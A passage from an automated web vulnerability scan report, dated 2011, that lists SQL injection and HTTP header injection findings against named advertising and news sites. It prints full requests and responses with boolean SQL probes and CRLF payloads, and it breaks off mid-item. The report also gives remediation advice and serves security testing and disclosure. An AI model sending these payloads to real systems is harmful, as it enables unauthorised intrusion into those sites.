29.78. https://servicing.capitalone.com/C1/Themes/TopTabMenu/Images/Marketing/Ban_IPOS.gif

29.79. https://servicing.capitalone.com/C1/Themes/TopTabMenu/images/header_bg.gif

29.80. http://showadsak.pubmatic.com/AdServer/AdServerServlet

29.81. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

29.82. http://sr2.liveperson.net/hcp/html/mTag.js

29.83. http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4

29.84. http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4

29.85. http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4

29.86. http://syn.5min.com/handlers/SenseHandler.ashx

29.87. http://trk.etrigue.com/track.php

29.88. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

29.89. http://web2.checkm8.com/adam/detect

29.90. http://widgets.klout.com/public/scripts/widget_hover.js

29.91. http://wow.curse.com/Themes/Common/CS/images/Common/star-left-off.gif

29.92. http://wow.curse.com/Themes/Common/CS/images/Common/star-left-on.gif

29.93. http://wow.curse.com/Themes/Common/CS/images/Common/star-right-off.gif

29.94. http://wow.curse.com/Themes/Common/CS/images/Common/star-right-on.gif

29.95. http://wow.curse.com/adserver/default.aspx

29.96. http://www.articleonepartners.com/images/favicon.ico

29.97. http://www.articleonepartners.com/images/ipwatchdog.png

29.98. http://www.asp.net/omniture/analyticsid.aspx

29.99. http://www.betabeat.com/wp-admin/admin-ajax.php

29.100. http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php

29.101. https://www.capitalone.com/favicon.ico

29.102. http://www.codeplex.com/site/analyticsid.aspx

29.103. http://www.fiddler2.com/fiddler2/updatecheck.asp

29.104. http://www.jackhenry.com/logos/cdd775ef-7b5f-4921-bd1a-c577d8029e28.gif

29.105. http://www.jackhenrybanking.com/images/b7cf526e-2e5f-4898-9d62-3bb61fdd6dcf.gif

29.106. http://www.nmmlaw.com/favicon.ico

29.107. http://www.othersonline.com/favicon.ico

29.108. http://www.seashepherd.org/favicon.ico

29.109. http://www.silverlight.net/omniture/analyticsid

29.110. http://www.silverpop.com/de/images/headers/About_L3.jpg

29.111. http://www.silverpop.com/de/images/headers/Clients_L3.jpg

29.112. http://www.silverpop.com/de/images/headers/Impressum_L3.jpg

29.113. http://www.silverpop.com/de/images/headers/NewsEvents_L3.jpg

29.114. http://www.silverpop.com/de/images/headers/PrivacyLegal_L3.jpg

29.115. http://www.silverpop.com/de/images/headers/Resources_L3.jpg

29.116. http://www.silverpop.com/favicon.ico

29.117. http://www.silverpop.com/global/dropmenu/settings.js

29.118. http://www.silverpop.com/images/headers/Clients_L3.jpg

29.119. http://www.silverpop.com/images/headers/NewsEvents_L3.jpg

29.120. http://www.silverpop.com/images/headers/Partners_L3.jpg

29.121. http://www.silverpop.com/images/headers/Preferences_L3.jpg

29.122. http://www.silverpop.com/images/headers/PrivacyLegal_L3.jpg

29.123. http://www.silverpop.com/images/headers/Resources_L3.jpg

29.124. http://www.silverpop.com/images/headers/Services_L3.jpg

29.125. http://www.silverpop.com/images/headers/Sitemap_L3.jpg

29.126. http://www.silverpop.com/images/home/banners/Dreamforce.jpg

29.127. http://www.silverpop.com/images/home/banners/Lead-Management.jpg

29.128. http://www.silverpop.com/images/roles/banner_B2B-Marketer.jpg

29.129. http://www.silverpop.com/images/roles/banner_Email-Marketer.jpg

29.130. http://www.silverpop.com/images/roles/banner_agencies.jpg

29.131. http://www.silverpop.com/imx/gui_background.jpg

29.132. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp

30. Content type is not specified

30.1. http://ad.yieldmanager.com/st

30.2. http://greatponds.squarespace.com/favicon.ico

30.3. http://media.trafficmp.com/a/js

30.4. http://www.greatpondsma.org/favicon.ico

31. SSL certificate

31.1. https://code.google.com/

31.2. https://domsnitch.googlecode.com/



1. SQL injection  next
There are 5 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://web2.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web2.checkm8.com
Path:   /adam/detect

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play=&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response 1

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:22 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.17 NY-AD7
Set-cookie: A=d1LS96wDHW31vc9HH6Mca;Path=/;
Set-cookie: C=oeMS96wzNNT9cdadapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:42 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.web2.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 170777909/1244522061/3644782917/4000817842
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play=&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response 2

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:22 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=oeMS96wE8Z4ZcdadapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:42 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.web2.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 152987262/1226731317/3644782917/4000817842
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.2. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.betabeat.com
Path:   /wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11107432'%20or%201%3d1--%20 and 11107432'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content11107432'%20or%201%3d1--%20/themes/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:03 GMT
Server: VoxCAST
Content-Length: 460
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content11107432' or 1=1-- /themes/nyo_tech/images
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content11107432'%20or%201%3d2--%20/themes/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:03 GMT
Server: VoxCAST
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content11107432' or 1=2-- /themes/nyo_tech/images
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>

1.3. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.betabeat.com
Path:   /wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes'%20and%201%3d1--%20/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:04 GMT
Server: VoxCAST
Content-Length: 453
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/betabe
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes'%20and%201%3d2--%20/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:04 GMT
Server: VoxCAST
Content-Length: 472
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/betabe
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>

1.4. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.betabeat.com
Path:   /wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20937989'%20or%201%3d1--%20 and 20937989'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/nyo_tech20937989'%20or%201%3d1--%20/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:05 GMT
Server: VoxCAST
Content-Length: 460
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes/nyo_tech20937989' or 1=1-- /images
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes/nyo_tech20937989'%20or%201%3d2--%20/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:05 GMT
Server: VoxCAST
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes/nyo_tech20937989' or 1=2-- /images
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>

1.5. http://www.observer.com/wp-content/themes/nyo_tech/images/observer.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.observer.com
Path:   /wp-content/themes/nyo_tech/images/observer.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes'%20and%201%3d1--%20/nyo_tech/images/observer.png?1310084808 HTTP/1.1
Host: www.observer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/wp-content/themes/nyo_tech/stylesheets/observer.css
Cookie: __gads=ID=5f64fd7a7ab7d5d0:T=1311264759:S=ALNI_Mb3Is20dJdZM1lFiPbSft2ttJqrEQ

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:13:55 GMT
Server: VoxCAST
Content-Length: 472
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/observ
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.observer.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes'%20and%201%3d2--%20/nyo_tech/images/observer.png?1310084808 HTTP/1.1
Host: www.observer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/wp-content/themes/nyo_tech/stylesheets/observer.css
Cookie: __gads=ID=5f64fd7a7ab7d5d0:T=1311264759:S=ALNI_Mb3Is20dJdZM1lFiPbSft2ttJqrEQ

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:13:55 GMT
Server: VoxCAST
Content-Length: 453
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/observ
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.observer.com Port 80</address>
</body></html>

2. HTTP header injection  previous  next
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/ad/x1.aud/capitalone/exclusion [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/x1.aud/capitalone/exclusion

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 857aa%0d%0a08a4076f552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /857aa%0d%0a08a4076f552/x1.aud/capitalone/exclusion;sz=1x1;ord=1234567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/857aa
08a4076f552
/x1.aud/capitalone/exclusion;sz=1x1;ord=1234567:
Date: Fri, 22 Jul 2011 20:31:34 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/N5762.interclick.com/B5644777.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5762.interclick.com/B5644777.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 52bf7%0d%0ab0653725eae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /52bf7%0d%0ab0653725eae/N5762.interclick.com/B5644777.4;sz=728x90;pc=;click=http://a1.interclick.com/icaid/180684/tid/3beaebd4-bdf2-41be-a78d-f9e43cf0a056/click.ic?;ord=634468586978366444? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=6;sz=728x90;ord=101352252258050
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/52bf7
b0653725eae
/N5762.interclick.com/B5644777.4;sz=728x90;pc=;click=http: //a1.interclick.com/icaid/180684/tid/3beaebd4-bdf2-41be-a78d-f9e43cf0a056/click.ic
Date: Thu, 21 Jul 2011 19:32:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/scmag.hmktus/sc [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8bcac%0d%0aa53c51e38c5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8bcac%0d%0aa53c51e38c5/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/
Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8bcac
a53c51e38c5
/scmag.hmktus/sc;log=0;sid=0;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=907953021859604900:
Date: Fri, 22 Jul 2011 20:15:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload b4827%0d%0a1a9ebdf4b81 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

